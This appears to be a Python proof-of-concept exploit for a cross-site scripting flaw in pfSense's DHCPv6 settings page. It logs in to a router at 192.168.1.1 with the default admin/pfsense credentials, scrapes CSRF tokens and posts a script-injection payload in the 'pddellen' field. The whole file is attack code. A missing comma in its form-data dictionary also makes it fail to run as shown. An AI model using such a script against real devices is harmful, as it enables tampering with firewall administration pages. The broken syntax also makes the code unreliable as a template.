#!/usr/bin/env python3
import requests
requests.packages.urllib3.disable_warnings()
from bs4 import BeautifulSoup

baseurl  = 'https://192.168.1.1'

target = baseurl + '/services_dhcpv6.php'

login_data = {
    'login'        : 'Login',
    'usernamefld'  : 'admin',
    'passwordfld'  : 'pfsense',
}

target_data = {
    "if": "lan",
    "pdprefix": "2001:db8:12:34::",
    "pdprefixlen": "64",
    "pddellen": '64" || alert(\"XSS\") || \"'
    "denyunknown": "disabled",
    "save": "Save",
}

headers = {'user-agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0'}

with requests.Session() as s:
    # Fetch CSRF token from login page
    r = s.get(baseurl, headers=headers, verify=False)

    soup = BeautifulSoup(r.text, 'lxml')
    login_data['__csrf_magic'] = soup.find('input', attrs = { 'name' : '__csrf_magic' })['value']

    # Login
    r = s.post(baseurl, data=login_data, headers=headers)

    # Find the next CSRF token
    soup = BeautifulSoup(r.text, 'lxml')
    target_data['__csrf_magic'] = soup.find('input', attrs = { 'name' : '__csrf_magic' })['value']

    # Submit actual request
    r = s.post(target, data=target_data, headers=headers)

    # Dump input errors from response
    soup = BeautifulSoup(r.text, 'lxml')
    input_errors = [errors.text for errors in soup.select('div.input-errors ul li')]
    if (input_errors):
        print("Input errors:\n")
        for ie in input_errors:
            print("* " + ie + "\n")

print('Done')